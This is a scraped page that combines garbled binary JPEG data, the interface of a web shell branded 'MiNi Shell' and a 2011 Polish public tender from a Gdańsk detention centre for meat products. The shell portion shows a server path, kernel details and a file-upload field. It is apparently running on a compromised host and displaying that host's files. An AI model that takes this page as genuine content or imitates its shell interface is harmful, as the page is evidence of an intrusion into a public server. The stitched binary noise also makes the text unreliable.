JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20110404/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20110404/106025-N-2011.html

<p class="kh_header"><b>Gdańsk: Przetarg nieograniczony nr 4/DKw/Ż/2011 na dostawy mięsa, podrobów i produktów mięsnych</b><br>
<b>Numer ogłoszenia: 106025 - 2011; data zamieszczenia: 04.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Areszt Śledczy , ul. Kurkowa 12, 80-803 Gdańsk, woj. pomorskie, tel. 058 3231000, 3231260, faks 058 3025125.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony nr 4/DKw/Ż/2011 na dostawy mięsa, podrobów i produktów mięsnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są dostawy mięsa, wędlin i produktów mięsnych (CPV 15100000-9) do bloku żywnościowego Aresztu Śledczego w Gdańsku od daty podpisania umowy przez okres 12 miesięcy.
1.	Przewidywana przez zamawiającego wielkość zamówienia wynosi:
I część zamówienia - mięso, wędliny i produkty mięsne
Lp.
Przedmiot zamówienia - I część 
Ilość w kg
Kod CPV
Forma/opakowanie
Mięso, podroby i tłuszcze 	  PN-A-82001/A2:1996		
1
Antrykot bez kości
960
15111100-0
Forma naturalna  w całości z zachowaniem pierwotnej struktury
2
Karkówka bez kości
120
15113000-3
Forma naturalna w całości z zachowaniem pierwotnej struktury
3
Kości schabowe
6000
15113000-3
Forma naturalna w kawałkach
4
Mięso gulaszowe wołowe pakowane Vacuum po ok. 2 kg
5760
  15111190-7	
Forma - duże kawałki ok. 5cm x 8cm 
5
Mięso mielone wieprzowo - wołowe pakowane Vacuum po ok. 2 kg
4560
15131620-7
Forma rozdrobniona, zawartość tłuszczu do 30%, mięso niegarmażeryjne
6
Mięso wieprzowe rozdrobnione pakowane Vacuum po ok. 2 kg
2640
15113000-3
Forma rozdrobniona w kawałkach 
7
Ogony wieprzowe
540
15113000-3
Forma naturalna
8
Schab z  kością
120
15111100-0
Forma naturalna  w całości z zachowaniem pierwotnej struktury
9
Szponder 
1920
   15113000-3	
Forma naturalna w kawałkach
10
Wątroba wołowa mrożona
2160
   15111190-7	
Forma naturalna  w całości z zachowaniem pierwotnej struktury
11
Łój wołowy mrożony 
96
15412200-1
Forma naturalna, porcjowany po ok. 0,5kg/szt.
Wędliny, wyroby podrobowe, wędzonki	PN-A-82007/A1:1998; PN-A-82012:1996	
12
Blok kanapkowy
2040
15131133-6
Produkowany  w formie bloku ok. 2kg/szt., pakowany  w osłonkę
13
Blok szynkowy
300
15131133-6
Produkowany  w formie bloku ok. 2kg/szt., pakowany w osłonkę
14
Boczek faszerowany
1020
15131133-6
Produkowany  w formie walca ok. 2kg/szt., owijany sznurkiem lub w siatce
15
Kaszanka
2160
15131134-3
Produkowana  w formie walca ok. 2kg/szt., pakowana w osłonkę
16
Kiełbasa biała parzona
120
15131133-6
Produkowana  w formie pęta ok. 0,100kg/szt., pakowana w osłonkę
17
Kiełbasa czosnkowa
2040
15131133-6
Produkowana  w formie pęta ok. 0,2kg/szt., pakowana w osłonkę
18
Kiełbasa dębicka
300
15131133-6
Produkowana  w formie pałki ok. 1,5kg/szt., pakowana w osłonkę
19
Kiełbasa golonkowa prasowana
300
15131133-6
Produkowana  w formie pałki ok. 1,5kg/szt., pakowana w osłonkę
20
Kiełbasa luncheon-meat 
1440
15131133-6
Produkowana  w formie walca ok. 2kg/szt., pakowana w osłonkę
21
Kiełbasa metka grubomielona
2040
15131133-6
Produkowana  w formie pałki ok. 2kg/szt., pakowana w osłonkę
22
Kiełbasa mielonka prasowana
2040
15131133-6
Produkowana  w formie bloku ok. 2kg/szt., pakowana osłonkę
23
Kiełbasa mortadela
2040
15131133-6
Produkowana  w formie walca ok. 2kg/szt., pakowana w osłonkę
24
Kiełbasa mortadela z papryką
1020
15131133-6
Produkowana  z dodatkiem papryki marynowanej w formie walca ok. 2kg/szt., pakowana w osłonkę 
25
Kiełbasa parówkowa
1020
15131133-6
Produkowana  w formie pęta ok. 0,09kg/szt., pakowana w osłonkę
26
Kiełbasa pieprzowa
2040
15131133-6
Produkowana  w formie pęta ok. 0,2kg/szt., pakowana w osłonkę
27
Kiełbasa piwna
36
15131133-6
Produkowana  w formie walca ok. 2kg/szt., pakowana w osłonkę
28
Kiełbasa szynkowa
420
15131133-6
Produkowana  w formie walca ok. 2kg/szt., pakowana w osłonkę
29
Kiełbasa śląska
960
15131133-6
Produkowana  w formie pęta ok. 0,2kg/szt., pakowana w osłonkę
30
Kiełbasa zielonogórska
300
15131133-6
Produkowana  w formie pałki ok. 2kg/szt., pakowana w osłonkę
31
Kiełbasa zwyczajna
3360
15131133-6
Produkowana  w formie pałki ok. 0,2kg/szt., pakowana w osłonkę
32
Kiełbasa żywiecka
36
15131133-6
Produkowana  w formie walca ok. 2kg/szt., pakowana w osłonkę
33
Parówka cielęca
300
15131133-6
Produkowany  w formie paluszków ok. 0,1kg/szt., pakowana w osłonkę
34
Parówka cienka
2040
15131133-6
Produkowana  w formie paluszków ok. 0,09kg/szt., pakowana w osłonkę
35
Pasztet pieczony
1020
15131133-6
Produkowany w formie bloku, pakowany w foremki ok. 1kg/szt.
36
Pasztetowa
1020
15131133-6
Produkowana  w formie walca ok. 2kg/szt., pakowana w osłonkę
37
Pieczeń chlebowa
1020
15131133-6
Produkowana  w formie walca ok. 2kg/szt., pakowana w osłonkę
38
Podgardle wędzone
1200
15131133-6
Kształt naturalny ok. 2kg/szt.
39
Polędwica sopocka
300
15131133-6
Kształt naturalny ok. 0,7kg/szt.
40

Przysmak tyrolski

2040
15131133-6
Produkowany  w formie bloku ok. 2kg/szt., pakowany w osłonkę
41
Salceson biały
1020
15131133-6
Produkowany  w formie walca ok. 3kg/szt., pakowany w osłonkę
42
Salceson czarny
1020
15131134-3	
Produkowany  w formie walca ok. 3kg/szt., pakowany w osłonkę

43

Szynka gotowana
300
15131133-6
Produkowana  w formie pałki  lub kula naturalna ok. 2kg/szt., pakowana w siatkę

44

Szynka mozaikowa
300
15131133-6
Produkowana  w formie walca ok. 2kg/szt., pakowana w osłonkę
45

Szynka w galarecie czysta bez dodatków
300
15131133-6
Produkowana  w formie walca ok. 2kg/szt., pakowana w  osłonkę. Szynka pokrojona w kostkę o wym. ok. 1cm x 1 cm






II część zamówienia - konserwy
Lp.
Przedmiot zamówienia - II część 
Ilość w kg
Kod CPV
Forma/opakowanie
Konserwy	PN-A-82022	
1
Pasztet mazowiecki konserwa ( 180-300g./szt.)
1020
15131300-8
Pakowany w puszki metalowe
2
Konserwa mięsna turystyczna  z samootwieraczem (180-300g./szt.) 
1020
   15131000-5	
Pakowana w puszki metalowe z samootwieraczem
2. W przypadku zamówienia ilości mniejszych od wyżej przedstawionych wykonawcy nie przysługują żadne roszczenia. Zamawiający zastrzega sobie prawo do dokonywania bieżących korekt zamawianych ilości w zależności od potrzeb.
3. Zamówienia składane będą telefonicznie na trzy dni  przed dostawą do godziny 12.00.
4. Dostawy realizowane będą: część I - dwa razy w tygodniu ( wtorki i piątki- oprócz świąt), część II - jeden raz na kwartał transportem wykonawcy i na koszt wykonawcy do magazynu żywnościowego AŚ Gdańsk  w godz. 8.00 - 13.00.
5. Dostarczany towar powinien spełniać Polskie Normy przenoszące normy europejskie lub normy innych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszące te normy albo Polskie Normy. Towar musi być świeży, dobrej jakości, wolny od wad, wytworzony zgodnie z ustawą z dnia 25 sierpnia 2006r. bezpieczeństwie żywności i żywienia (Dz. U. Nr 171 poz.1225 z póź. zm.) oraz zgodnie z ustawą z dnia 16 grudnia 2005 r. o produktach pochodzenia zwierzęcego ( Dz.U. z 2006r. Nr 17 poz. 127 z póź. zm.).
6. Termin przydatności do spożycia liczony od daty dostawy dla mięs, podrobów i tłuszczy  musi wynosić nie mniej niż 4 dni; dla wędlin, wyrobów podrobowych i wędzonek nie mniej niż 6 dni, dla konserw - nie mniej niż 6 miesięcy. Na życzenie zamawiającego mięsa, mięsa z kością i kości dostarczane będą w postaci zamrożonej przez co wydłużony zostanie termin przydatności do spożycia co najmniej o 14 dni.
7.  Opakowania:
a) jednostkowe jednorazowe - osłonki sztuczne, naturalne ściśle przylegające do farszu, foremki oraz puszki metalowe atestowane przez Państwowy Zakład Higieny
b) zbiorcze i transportowe -  pojemniki  metalowe lub z tworzywa sztucznego gładkie, czyste, przykryte wiekiem lub zaplombowane (zwrotne przy kolejnej dostawie) oraz kartonowe. 
8. Na każdym opakowaniu jednostkowym lub  zbiorczym należy umieścić zawieszkę, obwolutę lub etykietę trwale przymocowaną do opakowania oraz podać informacje określone w ustawie z dnia 21.12.2000r. o jakości handlowej artykułów rolno-spożywczych (Dz. U. z 2005r.  Nr 187 poz.1577 z póź. zm.).
9.Wykonawca zobowiązuje się przedstawiać przy  każdej dostawie handlowy dokument identyfikacyjny HDI lub świadectwo zdrowia o którym mowa w § 4  pkt 9  a lub b rozporządzenia Ministra Rolnictwa i Rozwoju  Wsi z dn. 29 czerwca 2004r.( Dz. U. Nr 160 poz. 1673  z póź. zm.) w sprawie wymagań weterynaryjnych  przy  produkcji i dla produktów mięsnych oraz innych produktów pochodzenia zwierzęcego umieszczanych  na rynku na przedmiot zamówienia.
10.Zapłata za odebrany towar następować będzie przelewem bankowym na konto wskazane przez dostawcę, przy czym termin płatności wyznaczony przez wykonawcę nie może być krótszy niż 30 dni od daty dostarczenia faktury Zamawiającemu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków zgodnie z załacznikiem nr 3 do siwz nr 4/DKw/Ż/2011</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków zgodnie z załacznikiem nr 3 do siwz nr 4/DKw/Ż/2011</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków zgodnie z załacznikiem nr 3 do siwz nr 4/DKw/Ż/2011</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków zgodnie z załacznikiem nr 3 do siwz nr 4/DKw/Ż/2011</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków zgodnie z załacznikiem nr 3 do siwz nr 4/DKw/Ż/2011</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 Ustawy Zamawiający dopuszcza  możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, jeżeli zmiany te są korzystne dla Zamawiającego lub konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. Warunkiem takiej zmiany jest podpisanie aneksu do istniejącej umowy oraz udokumentowanie w/w okoliczności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Kurkowa 12; 80-803 Gdańsk, email: dkw_gdansk@sw.gov.pl, fax: 302-51-25.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.04.2011 godzina 10:00, miejsce: Sekretariat As Gdańsk ul. Kurkowa 12; 80-803 Gdańsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Mięso, wędliny i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I część zamówienia - antrykot bez kości 960kg, karkówka bez kości 120kg, kości schabowe 6000kg, mięso gulaszowe wołowe 5760 kg, mięso mielone wieprzowo - wołowe 4560kg, mięso wieprzowe rozdrobnione 2640kg, ogony wieprzowe 540kg, schab z  kością 120kg, szponder 1920kg, wątroba wołowa mrożona 2160kg, łój wołowy mrożony 96kg, blok kanapkowy 2040kg, blok szynkowy 300kg, boczek faszerowany 1020kg, kaszanka 2160kg, kiełbasa biała parzona 120kg, kiełbasa czosnkowa 2040kg, kiełbasa dębicka 300kg, kiełbasa golonkowa prasowana 300kg, kiełbasa luncheon-meat  1440kg, kiełbasa metka 2040kg, kiełbasa mielonka prasowana 2040kg, kiełbasa mortadela 2040kg, kiełbasa mortadela z papryką 2020kg, kiełbasa parówkowa 1020kg, kiełbasa pieprzowa 2040kg, kiełbasa piwna 36kg, kiełbasa szynkowa 420 kg, kiełbasa śląska 960kg, kiełbasa zielonogórska 300kg, kiełbasa zwyczajna 3360kg, kiełbasa żywiecka 36kg, parówka cielęca 300kg, parówka cienka 2040kg, pasztet pieczony 1020kg, pasztetowa 1020kg, pieczeń chlebowa 1020kg, podgardle wędzone 1200kg, polędwica sopocka 300kg, przysmak tyrolski 2040kg, salceson biały 1020kg, salceson czarny 1020kg, szynka gotowana 300kg, szynka mozaikowa 300kg, szynka w galarecie czysta bez dodatków 300kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Konserwy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> II część zamówienia - pasztet mazowiecki konserwa ( 180-300g./szt.) 1020kg, konserwa mięsna turystyczna  z samootwieraczem (180-300g./szt.) 1020kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com